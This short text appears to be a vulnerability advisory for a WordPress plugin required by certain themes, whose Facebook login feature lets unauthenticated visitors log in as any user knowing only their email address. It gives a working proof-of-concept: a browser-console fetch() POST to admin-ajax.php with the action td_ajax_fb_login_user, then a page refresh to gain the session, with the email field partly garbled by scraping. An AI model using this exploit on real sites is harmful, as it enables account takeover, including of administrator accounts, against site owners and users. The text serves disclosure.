The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=td_ajax_fb_login_user&user;[email][email protected]’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Then refresh the page to be logged in as the user with the [email protected] email address